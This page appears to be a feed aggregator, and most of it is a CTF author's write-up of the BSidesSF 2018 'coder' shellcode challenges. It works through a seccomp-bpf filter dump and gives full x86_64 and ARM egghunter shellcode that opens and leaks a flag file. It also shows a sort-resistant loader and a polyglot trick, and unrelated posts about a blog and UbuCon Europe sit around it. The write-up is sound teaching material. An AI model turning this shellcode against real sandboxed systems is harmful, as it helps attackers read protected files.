For example, Let's Roast Mako describes itself "A place to beat up Mako. In peace. It's an inspiration to everyone!"

The second is the Fuck Mako Blog which describes itself with series of tag-lines including "Mako can fuck right off and we're really not sorry about that," "Welcome aboard the SS Fuck-Mako;" and "Because Mako is unnecessary." Sub-pages of the site include:

I'll admit I'm a little disquieted.

21 Apr 2018 9:31pm GMT

David Tomaschik: BSidesSF CTF 2018: Coder Series (Author's PoV)

Introduction

As the author of the "coder" series of challenges (Intel Coder, ARM Coder, Poly Coder, and OCD Coder) in the recent BSidesSF CTF, I wanted to share my perspective on the challenges. I can't tell if the challenges were uninteresting, too hard, or both, but they were solved by far fewer teams than I had expected. (And than we had rated the challenges for when scoring them.)

The entire series of challenges were based on the premise "give me your shellcode and I'll run it", but with some limitations. Rather than forcing players to find and exploit a vulnerability, we wanted to teach players about dealing with restricted environments like sandboxes, unusual architectures, and situations where your shellcode might be manipulated by the process before it runs.

Overview

Each challenge requested the length of your shellcode followed by the shellcode and allowed for ~1k of shellcode (which is more than enough for any reasonable exploitation effort on these). Shellcode was placed into newly-allocated memory with RWX permissions, with a guard page above and below. A new stack was allocated similarly, but without the execute bit set.

Each challenge got a seccomp-bpf sandbox setup, with slight variations in the limitations of the sandbox to encourage players to look into how the sandbox is created:

The shellcode was then executed by a helper function written in assembly. (To swap the stack then execute the shellcode.)

There were a few things that made these challenges harder than they might have otherwise been:

A Seccomp Primer

Seccomp initially was a single system call that limited the calling thread to use a small subset of syscalls. seccomp-bpf extended this to use Berkeley Packet Filters (BPF) to allow for filtering system calls. The system call number and arguments (from registers) are placed into a structure, and the BPF is used to filter this structure. The filter can result in allowing or denying the syscall, and on a denied syscall, an error may be returned, a signal may be delivered to the calling thread, or the thread may be killed.

Because all of the registers are included in the structure, seccomp-bpf allows for filtering not only based on the system call itself, but on the arguments passed to the system call. One quirk of this is that it is completely unaware of the types of the arguments, and only operates on the contents of the registers used for passing arguments. Consequently, pointer types are compared by the pointer value and not by the contents pointed to. I actually hadn't thought about this before writing this challenge and limiting the values passed to open(). All of the challenges allowing open limited it to ./flag.txt, so not only could you only open that one file, you could only do it by using the same pointer that was passed to the library functions that setup the filtering.

An interesting corollary is that if you limit system call arguments by passing in a pointer value, you probably want it to be a global, and you probably don't want it to be in writable memory, so that an attacker can't overwrite the desired string and still pass the same pointer.

Reverse Engineering the Sandbox

There's a wonderful toolset called seccomp-tools that provides the ability to dump the BPF structure from the process as it runs by using ptrace(). If we run the Intel coder binary under seccomp-tools, we'll see the following structure:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x11 0xc000003e  if (A != ARCH_X86_64) goto 0019
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x0f 0x00 0x40000000  if (A >= 0x40000000) goto 0019
 0004: 0x15 0x0d 0x00 0x00000003  if (A == close) goto 0018
 0005: 0x15 0x0c 0x00 0x0000000f  if (A == rt_sigreturn) goto 0018
 0006: 0x15 0x0b 0x00 0x00000028  if (A == sendfile) goto 0018
 0007: 0x15 0x0a 0x00 0x0000003c  if (A == exit) goto 0018
 0008: 0x15 0x09 0x00 0x000000e7  if (A == exit_group) goto 0018
 0009: 0x15 0x00 0x09 0x00000002  if (A != open) goto 0019
 0010: 0x20 0x00 0x00 0x00000014  A = args[0] >> 32
 0011: 0x15 0x00 0x07 0x00005647  if (A != 0x5647) goto 0019
 0012: 0x20 0x00 0x00 0x00000010  A = args[0]
 0013: 0x15 0x00 0x05 0x8bd01428  if (A != 0x8bd01428) goto 0019
 0014: 0x20 0x00 0x00 0x0000001c  A = args[1] >> 32
 0015: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0019
 0016: 0x20 0x00 0x00 0x00000018  A = args[1]
 0017: 0x15 0x00 0x01 0x00000000  if (A != 0x0) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x06 0x00 0x00 0x00000000  return KILL

The first two lines check the architecture of the running binary (presumably because the system call numbers are architecture-dependent). The filter then loads the system call number to determine the behavior for each syscall. Lines 0004 through 0008 are syscalls that are allowed unconditionally. Line 0009 ensures that anything but the already-allowed syscalls or open() results in killing the process.

Lines 0010-0017 check the arguments passed to open(). Since the BPF can only compare 32 bits at a time, the 64-bit registers are split in two with shifts. The first few lines ensure that the filename string (args[0]) is a pointer with value 0x56478bd01428. Of course, due to ASLR, you'll find that this value varies with each execution of the program, so no hard coding your pointer values here! Finally, it checks that the second argument (args[1]) to open() is 0x0, which corresponds to O_RDONLY. (No opening the flag for writing!)

seccomp-tools really makes this so much easier than manual reversing would be.

Solving Intel & ARM Coder

The solutions for both Intel Coder and ARM Coder are very similar. First, let's determine the steps we need to undertake:

  1. Locate fhe ./flag.txt string that was used in the seccomp-bpf filter.
  2. Open ./flag.txt.
  3. Read the file and send the contents to the player. (sendfile() on Intel, read() and write() on ARM)

In order to not be a total jerk in these challenges, I ensured that one of the registers contained a value somewhere in the .text section of the binary, to make it somewhat easier to hunt for the ./flag.txt string. (This was actually always the address of the function that executed the player shellcode.) Consequently, finding the string should have been trivial using the commonly known egghunter techniques.

At this point, it's basically just a straightforward shellcode to open() the file and send its contents. The entirety of my example solution for Intel Coder is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
BITS 64

; hunt for string based on rdx
hunt:
add rdx, 0x4
mov rax, 0x742e67616c662f2e   ; ./flag.t
cmp rax, [rdx]
jne hunt

xor rax, rax
mov rdi, rdx              ; path
xor rax, rax
mov al, 2                 ; rax for SYS_open
xor rdx, rdx              ; mode
xor rsi, rsi              ; flags
syscall

xor rdi, rdi
inc rdi                   ; out_fd
mov rsi, rax              ; in_fd from open
xor rdx, rdx              ; offset
mov r10, 0xFF             ; count
mov rax, 40               ; SYS_sendfile
syscall

xor rax, rax
mov al, 60                ; SYS_exit
xor rdi, rdi              ; code
syscall

For ARM coder, the solution is much the same, except using read() and write() instead of sendfile().

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
.section .text
.global shellcode
.arm

shellcode:
  # r0 = my shellcode
  # r1 = new stack
  # r2 = some pointer

  # load ./fl into r3
  MOVW r3, #0x2f2e
  MOVT r3, #0x6c66
  # load ag.t into r4
  MOVW r4, #0x6761
  MOVT r4, #0x742e
hunt:
  LDR r5, [r2, #0x4]!
  TEQ r5, r3
  BNE hunt
  LDR r5, [r2, #0x4]
  TEQ r5, r4
  BNE hunt
  # r2 should now have the address of ./flag.txt

  # SYS_open
  MOVW r7, #5
  MOV r0, r2
  MOVW r1, #0
  MOVW r2, #0
  SWI #0

  # SYS_read
  MOVW r7, #3
  MOV r1, sp
  MOV r2, #0xFF
  SWI #0

  # SYS_write
  MOVW r7, #4
  MOV r2, r0
  MOV r1, sp
  MOVW r0, #1
  SWI #0

  # SYS_exit
  MOVW r7, #1
  MOVW r0, #0
  SWI #0

Poly Coder

Poly Coder was actually not very difficult if you had solved both of the above challenges. It required only reading from an already open FD and writing to an already open FD. You did have to search through the FDs to find which were open, but this was easy as any that were not would return -1, so looping until an amount greater than 0 was read/written was all that was required.

To produce shellcode that ran on both architectures, you could use an instruction that was a jump in one architecture and benign in the other. One such example is EB 7F 00 32, which is a jmp 0x7F in x86_64, but does some AND operation on r0 in ARM. Prefixing your shellcode with that, followed by up to 120 bytes of ARM shellcode, then a few bytes of padding, and the x86_64 shellcode at the end would work.

OCD Coder

As I recall it, one of the other members of our CTF organizing team joked "we should sort their shellcode before we run it." While intended as a joke, I took this as a challenge and began work to see if this was solvable. Obviously, the smaller the granularity (e.g., sorting by byte) the more difficult this becomes. I settled on trying to find a solution where it was sorted by 32-bit (DWORD) chunks, and found one with about 2 hours of effort.

Rather than try to write the entire shellcode in something that would sort correctly, I wrote a small loader that was manually tweaked to sort. This loader would then take the following shellcode and extract the lower 3 bytes of each DWORD and concatenate them. In this way, I could force ordering by inserting a one-byte tag at the most significant position of each 3 byte chunk.

It looks something like this:

1
2
3
4
5
6
7
8
9
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]

...

[3 bytes shellcode][3 by
tes shellcode][3 bytes s
hellcode]

The loader is as simple as this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
BITS 32

# assumes shellcode @eax
mov ecx, 0x24
and eax, eax
add eax, ecx
mov ebx, eax
inc edx
loop:
  mov edx, [eax]
  nop
  add eax, 4
  nop
  mov [ebx], edx
  inc ebx
  inc ebx
  nop
  inc ebx
  nop
  nop
  nop
  dec ecx
  nop
  nop
  nop
  jnz loop
nop

The large number of nops was necessary to get the loader to sort properly, as were tricks like using 3 inc ebx instructions instead of add ebx, 3. There's even trash instructions like inc edx that have no affect on the output, but serve just to get the shellcode to sort the way I needed. The x86 opcode reference was incredibly useful in finding bytes with the desired value to make things work.

I have no doubt there are shorter or more efficient solutions, but this got the job done.

Conclusion

We'll soon be releasing the source code to all of the challenges, so you can see the details of how this was all put together, but I wanted to share my insight into the challenges from the author's point of view. Hopefully those that did solve it (or tried to solve it) had a good time doing so or learned something new.

21 Apr 2018 7:00am GMT

20 Apr 2018

feedPlanet Ubuntu

Costales: UbuCon Europe 2018 | 1 Week to go!!

Yes! Everything is ready for the incoming UbuCon Europe 2018 in Xixón! 😃

We'll have an awesome weekend of conferences (with 4 parallel talks), podcasts, stands, social events... Most of them are in English, but there will be in Spanish & Asturian too.

\o/

The speakers are coming from all these countries:

\o/



Are you ready for an incredible UbuCon? :)

Testing the Main Room #noedits

Remember that you have transport discounts and a main social event: the espicha.

See you in Xixón! ❤

+ info

20 Apr 2018 3:56pm GMT